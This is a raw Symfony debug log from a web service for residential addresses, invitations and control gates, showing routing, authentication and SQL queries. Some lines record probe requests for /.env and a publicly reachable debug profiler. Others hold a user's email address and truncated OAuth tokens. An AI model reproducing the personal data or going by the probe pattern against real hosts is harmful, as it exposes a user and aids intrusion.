[2025-12-17 23:53:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 00:01:51] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 00:01:55] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 00:01:55] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 00:01:55] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 00:01:55] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 00:01:55] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 00:01:55] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 00:01:55] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 00:01:56] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 00:02:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=exception","method":"GET"} []
[2025-12-18 00:02:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 00:03:39] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 00:03:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 00:04:18] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 00:05:33] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
[2025-12-18 00:05:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
[2025-12-18 00:05:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 00:05:33] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
[2025-12-18 00:05:33] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 00:05:33] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 00:05:33] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 00:05:37] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
[2025-12-18 00:08:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=db","method":"GET"} []
[2025-12-18 00:08:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 00:09:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 00:10:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"83a376","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/83a376?panel=db","method":"GET"} []
[2025-12-18 00:10:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 00:11:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=db","method":"GET"} []
[2025-12-18 00:11:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 00:13:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 00:14:55] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 00:14:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 00:14:56] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:14:56] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:14:56] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:14:56] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 00:14:56] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 00:14:56] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 00:16:00] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"0409e5","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/0409e5/search/results?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-18 00:16:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=216.106.187.123&limit=10","method":"GET"} []
[2025-12-18 00:19:06] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-18 00:19:06] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["db188d1484388f19ab3d333397 [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 00:19:06] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"85f7a45a7f902076a7dd71f507 [...]","3":"2025-12-18 00:49:06","4":"","5":375,"6":"[]"} []
[2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 00:19:06] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"be6b1cddd474e5e6372d1ddea8 [...]","3":"2026-02-16 00:19:06","4":"","5":375,"6":"[]"} []
[2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 00:19:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 00:19:06] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 00:19:06] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"db188d1484388f19ab3d333397 [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 00:19:06] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"a725d03d-0217-4179-9082-5a05b0a9293e","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/a725d03d-0217-4179-9082-5a05b0a9293e/invitation/10/0?order=desc","method":"GET"} []
[2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [375,251,1] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-18 00:19:06] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [251,1] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [251,1] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [417] []
[2025-12-18 00:19:06] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:06] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-18 00:19:06] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 00:19:06] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:06] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["586cd940-fe5c-40f9-b203-99 [...]"] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["85f7a45a7f902076a7dd71f507 [...]"] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [375,1] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [375] []
[2025-12-18 00:19:07] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosmurillosemerena@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a725d03d-0217-4179-9082-5a [...]"] []
[2025-12-18 00:19:07] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:07] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [375,251] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["E9690C4C-7479-437B-82D6-F9 [...]",1,375] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
[2025-12-18 00:19:07] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.uuid = ? LIMIT 1 ["4cf416c3-f8a2-4b97-aec0-5e [...]"] []
[2025-12-18 00:19:07] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-18 00:19:07] doctrine.DEBUG: UPDATE device SET date_created = ?, date_modified = ?, os = ? WHERE id = ? ["2022-11-28 02:48:14","2025-12-18 00:19:07","26.2",566] []
[2025-12-18 00:19:07] doctrine.DEBUG: "COMMIT" [] []
[2025-12-18 00:19:07] doctrine.DEBUG: SELECT d0_.id AS id_0, d0_.uuid AS uuid_1, d0_.status AS status_2, d0_.date_created AS date_created_3, d0_.date_modified AS date_modified_4, d0_.guid AS guid_5, d0_.endpoint_arn AS endpoint_arn_6, d0_.token AS token_7, d0_.identifier AS identifier_8, d0_.model AS model_9, d0_.os AS os_10, d0_.app_version AS app_version_11, d0_.arn_status AS arn_status_12, d0_.type AS type_13, d0_.app AS app_14, d0_.user_id AS user_id_15 FROM device d0_ WHERE (d0_.token = ?) AND (d0_.uuid <> ?) ["925b97ba1533870e655db98c25 [...]","4cf416c3-f8a2-4b97-aec0-5e [...]"] []
